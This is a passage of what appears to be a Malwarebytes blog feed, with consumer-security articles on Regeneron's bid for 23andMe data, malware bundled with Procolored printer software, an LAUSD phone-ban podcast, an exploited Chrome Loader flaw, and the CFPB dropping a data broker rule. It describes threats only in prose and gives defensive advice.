
Dr. George Yancopoulos, Regeneron’s president, said in a statement:

“We believe we can help 23andMe deliver and build upon its mission to help people learn about their own DNA and how to improve their personal health, while furthering Regeneron’s efforts to improve the health and wellness of many.”

However, the scenario is less grim than the fears uttered by Senator Cassidy, chair of the US Senate Health, Education, Labor, and Pensions Committee, who expressed concerns about foreign adversaries, including the Chinese Communist Party, acquiring the sensitive genetic data of millions of Americans through 23andMe.

Regeneron already manages genetic data from nearly three million people, so 23andMe’s 15 million customers significantly expand this resource. Besides the genetic data itself, Regeneron likely values the consumer genetics business infrastructure and research services that 23andMe built, which can complement Regeneron’s pharmaceutical pipeline and personalized medicine efforts.

Genetic data is uniquely sensitive because it contains deeply personal information about an individual’s health risks, ancestry, and even family relationships. Unlike traditional medical records protected under HIPAA, 23andMe’s genetic data is covered primarily by consumer privacy laws, which offer weaker protections.

What can consumers do to protect their data?

Customers should actively manage their data on 23andMe by reviewing policies, deleting data if desired, and staying vigilant about how their sensitive genetic information is used.

People that have submitted samples to 23andMe have three different options, each providing a different level of privacy.

1. Delete your genetic data from 23andMe

For 23andMe customers who want to delete their data from 23andMe:

• Log into your account and navigate to Settings.
• Under Settings, scroll to the section titled 23andMe data. Select View.
• You will be asked to enter your date of birth for extra security. 
• In the next section, you’ll be asked which, if there is any, personal data you’d like to download from the company (make sure you’re using a personal, not public, computer). Once you’re finished, scroll to the bottom and select Permanently delete data.
• You should then receive an email from 23andMe detailing its account deletion policy and requesting that you confirm your request. Once you confirm you’d like your data to be deleted, the deletion will begin automatically, and you’ll immediately lose access to your account. 

2. Destroy your 23andMe test sample

If you previously opted to have your saliva sample and DNA stored by 23andMe, but want to change that preference, you can do so from your account settings page, under “Preferences.”

3. Revoke permission for your genetic data to be used for research

If you previously consented to 23andMe and third-party researchers using your genetic data and sample for research, you may withdraw consent from the account settings page, under Research and Product Consents.

Check if you were caught up in the 23AndMe data breach

Additionally, you may want to check if your data was exposed in the 2023 data breach. We recommend that you run a scan using our free Digital Footprint Portal to see if your data was exposed in the breach, and then to take additional steps to protect yourself (we’ll walk you through those).

SCAN NOW

We don’t just report on data privacy—we help you remove your personal information

Cybersecurity risks should never spread beyond a headline. With Malwarebytes Personal Data Remover, you can scan to find out which sites are exposing your personal information, and then delete that sensitive data from the internet.

You’d hope that spending $6,000 on a printer would give you a secure experience, free from viruses and other malware. However, in the case of Procolored printers, you’d be wrong.

The Shenzen-based company sells UV printers, which are able to print on a variety of materials including wood, acrylic, tile, and plastic. They come with all kinds of attractive features. However as reviewer Cameron Coward found out, they also came with malware (at least, until recently).

Coward received a review model of the Procolored V11 pro DTO UC printer that came with software on a USB thumb drive. “One of those was the Microsoft Visual C++ Redistributable in a zip folder,” he said in a review of the product. “But as soon as I unzipped it, Windows Defender quarantined the files and informed me that it found a Floxif virus.”

Floxif is a family of malware that infects a computer and installs a backdoor, giving the attacker control of the machine and allowing them to download other malware onto the system.

Coward also tried to download the control software for the printer from Procolored’s website, which linked to the mega.nz file sharing site. When he tried to download it, Google Chrome detected a virus and blocked it.

He checked in with the vendor, who denied that there was any malware and said the virus software was spotting a false positive (when it mistakenly identifies legitimate software as malicious).

Getting a second opinion

Coward asked for help on Reddit, and Karsten Hahn, principal malware researcher for cybersecurity company G Data CyberDefense, investigated the issue. After scanning 8 GB of software files for the Procolored products, all maintained on mega.nz, Hahn found no evidence of Floxif, he reported in an account of the investigation.

He did find two malware strains in the files, though. Win32.Backdoor.XRedRAT.A is a backdoor that first cropped up in other analyses last year. It gives the attacker complete control over the victim’s PC, including letting them enter command-line instructions, log keystrokes, and download or delete files.

The second, MSIL.Trojan-Stealer.CoinStealer.H, steals cryptocurrency from victims’ machines. It replaces cryptocurrency addresses in the clipboard with the attacker’s own, which has already received around $100,000 in presumably ill-gotten funds.

Both malware files were detected by Malwarebytes’  Machine Learning component DDS as Generic.Malware.AI.DDS, so Malwarebytes/ThreatDown customers were protected against these threats.

After confronting Procolored with the evidence, the company responded to Hahn:

“The software hosted on our website was initially transferred via USB drives. It is possible that a virus was introduced during this process.”

The organization said that it had taken steps to solve the problem, including temporarily taking down all software from its website and scanning all of its files.

“Only after passing stringent virus and security checks will the software be re-uploaded. This is a top priority for us, and we are taking it very seriously.”

However, Procolored hadn’t taken things seriously before that point. Searching the internet, Coward found that many owners of Procolored machines had reported the same issue. The infected files had been up for months.

A history of bundled malware

You might not think that this story applies to you. After all, only a small subset of our readers would be interested in buying such as specialist printer. However, this isn’t the only time when a manufacturer has shipped a product riddled with malware.

2017 saw IBM accidentally ship malware on a USB key containing initialization software for its storage devices. In 2018, Schneider Electric had to warn customers that some of the USB drives shipped with its battery monitoring software were infected with malware.

In 2019, we discovered that US government program providing Android phones to low-income users was found to be shipping them with malware.

Some of these malicious products were shipped on purpose by people who should have known better. In 2005, Sony shipped hidden software on its audio CDs that installed itself on Windows computers to stop them making digital copies. Removing it rendered the Windows installation useless.

The takeaway is this: just because a company has a respected brand doesn’t mean they can’t make mistakes. Take just as much care when installing something from a ‘reliable’ source as you would when doing anything else. Security software and caution go a long way.

We don’t just report on threats—we remove them

Cybersecurity risks should never spread beyond a headline. Keep threats off your devices by downloading Malwarebytes today.

This week on the Lock and Code podcast…

There’s a problem in class today, and the second largest school district in the United States is trying to solve it.

After looking at the growing body of research that has associated increased smartphone and social media usage with increased levels of anxiety, depression, suicidal thoughts, and isolation—especially amongst adolescents and teenagers—Los Angeles Unified School District (LAUSD) implemented a cellphone ban across its 1,000 schools for its more than 500,000 students.

Under the ban, students who are kindergartners all the way through high school seniors cannot use cellphones, smartphones, smart watches, earbuds, smart glasses, and any other electronic devices that can send messages, receive calls, or browse the internet. Phones are not allowed at lunch or during passing periods between classes, and, under the ban, individual schools decide how students’ phones are stored, be that in lockers, in magnetically sealed pouches, or just placed into sleeves at the front door of every classroom, away from students’ reach.

The ban was approved by the Los Angeles Unified School District through what is called a “resolution”—which the board voted on last year. LAUSD Board Member Nick Melvoin, who sponsored the resolution, said the overall ban was the right decision to help students.  

“The research is clear: widespread use of smartphones and social media by kids and adolescents is harmful to their mental health, distracts from learning, and stifles meaningful in-person interaction.”

Today, on the Lock and Code podcast with host David Ruiz, we speak with LAUSD Board Member Nick Melvoin about the smartphone ban, how exceptions were determined, where opposition arose, and whether it is “working.” Melvoin also speaks about the biggest changes he has seen in the first few months of the cellphone ban, especially the simple reintroduction of noise in hallways.

“[During a school visit last year,] every single kid was on their phone, every single kid. They were standing there looking, texting again, sometimes texting someone who was within a few feet of them, and it was quiet.”

Tune in today to listen to the full episode.

Show notes and credits:

Intro Music: “Spellbound” by Kevin MacLeod (incompetech.com)
Licensed under Creative Commons: By Attribution 4.0 License
http://creativecommons.org/licenses/by/4.0/
Outro Music: “Good God” by Wowa (unminus.com)

Listen up—Malwarebytes doesn’t just talk cybersecurity, we provide it.

Protect yourself from online attacks that threaten your identity, your files, your system, and your financial well-being with our exclusive offer for Malwarebytes Premium for Lock and Code listeners.

Google released an emergency update for the Chrome browser to patch an actively exploited vulnerability that could have serious ramifications.

The update brings the Stable channel to versions 136.0.7103.113/.114 for Windows and Mac and 136.0.7103.113 for Linux.

The easiest way to update Chrome is to allow it to update automatically, but you can end up lagging behind if you never close your browser or if something goes wrong—such as an extension stopping you from updating the browser.

To manually get the update, click Settings > About Chrome. If there is an update available, Chrome will notify you and start downloading it. Then all you have to do is restart the browser in order for the update to complete, and for you to be safe from those vulnerabilities.

This update is crucial since it addresses an actively exploited vulnerability which could allow an attacker to steal information you share with other websites. Google says it’s aware that knowledge of CVE-2025-4664 exists in the wild. But while Google didn’t acknowledge that the vulnerability is actually being actively exploited, the Cybersecurity and Infrastructure Security Agency (CISA) added the vulnerability to its Known Exploited Vulnerabilities catalog—a strong indication the vulnerability is being used out there.

Technical details

The vulnerability tracked as CVE-2025–4664, lies in the Chrome Loader component, which handles resource requests. When you visit a website, your browser often needs to load additional pieces of that site, such as images, scripts, or stylesheets, which may come from various sources. The Loader manages these requests to fetch and display those resources properly.

While it does that, it should enforce security policies that prevent one website from accessing data belonging to another website, a principle known as the “same-origin policy.”

The vulnerability lies in the fact that those security policies were not applied properly to Link headers. This allowed an attacker to set a referrer-policy in the Link header which tells Chrome to include full URLs, including sensitive query parameters.

This is undesirable since query parameters in full URLs often contain sensitive information such as OAuth tokens (used for authentication), session identifiers, and other private data.

Imagine you visit a website related to sensitive or financial information, and the URL includes a secret code in the address bar that proves it’s really you. Normally, when your browser loads images or other content from different websites, it keeps that secret code private. But because of this Chrome Loader flaw, a successful attacker can trick your browser into sending that secret code to a malicious website just by embedding an image or other resource there.

The attacker could, for example, embed a hidden image hosted at their own server, and harvest the full URLs. This means they can steal your private information without you realizing it, potentially letting them take over your account or other online services.

We don’t just report on threats – we help safeguard your entire digital identity

Cybersecurity risks should never spread beyond a headline. Protect your—and your family’s—personal information by using identity protection.

Last week on Malwarebytes Labs:

• Data broker protection rule quietly withdrawn by CFPB
• Meta sent cease and desist letter over AI training
• Google to pay $1.38 billion over privacy violations
• Android users bombarded with unskippable ads

Last week on ThreatDown:

• ThreatDown introduces Firewall Management
• Introducing Browser Phishing Protection: enhanced web security for your organization

Stay safe!

Our business solutions remove all remnants of ransomware and prevent you from getting reinfected. Want to learn more about how we can help protect your business? Get a free trial below.

TRY NOW

The Consumer Financial Protection Bureau (CFPB) has decided to withdraw a 2024 rule to limit the sale of Americans’ personal information by data brokers.

In a Federal Register notice published yesterday, the CFPB said it “has determined that legislative rulemaking is not necessary or appropriate at this time to address the subject matter”.

The data brokerage industry generates an estimated $300 billion in annual revenue. Data brokers actively collect and sell your Personally Identifiable Information (PII), including financial details, personal behavior, and interests, for profit. They often do this without seeking your consent or without making it clear that you have given consent.

The CFPB proposed the rule in December 2024 to curb data brokers from selling Americans’ sensitive personal and financial information. By restricting the sale of personal identifiers such as Social Security Numbers (SSNs) and phone numbers, the rule aimed to ensure that companies share financial data, like income, only for legitimate purposes, such as facilitating a mortgage approval, rather than selling it on to scammers who target people in financial distress.

The proposal sought to make data brokers comply with federal law and address serious threats posed by current industry practices. It targeted not only national security, surveillance, and criminal exploitation risks, but also aimed to limit doxxing and protect the personal safety of law enforcement personnel and domestic violence survivors.

The CFPB intended to treat data brokers like credit bureaus and background check companies, requiring them to comply with the Fair Credit Reporting Act (FCRA) regardless of how they use financial information. The proposal would also have required data brokers to obtain much more explicit and separately authorized consumer consent.

By setting it up this way it wouldn’t have interfered with the existing pathways created for and by the FCRA while offering more consumer protection.

However, acting CFPB Director Russell Vought said the agency had determined the rule was not for now, pointing to “updates to Bureau policies.”

Watchdog groups have a different view on the matter though. Matt Schwartz, a policy analyst at Consumer Reports, stated it would leave consumers vulnerable:

“Data brokers collect a treasure trove of sensitive information about virtually every American and sell that information widely, including to scammers looking to rip off consumers.”

If data brokers would be required to comply with the FCRA:

• They would have to ensure the accuracy and privacy of the data they collect and share.
• Consumers must be provided with mechanisms to dispute and correct inaccurate information.
• Consumers should be notified when their data is used for decisions about credit, insurance, or employment.
• They could face enforcement actions and penalties for non-compliance, as the Federal Trade Commission (FTC) and CFPB have done in the past.

We don’t just report on data privacy—we help you remove your personal information

Cybersecurity risks should never spread beyond a headline. With Malwarebytes Personal Data Remover, you can scan to find out which sites are exposing your personal information, and then delete that sensitive data from the internet.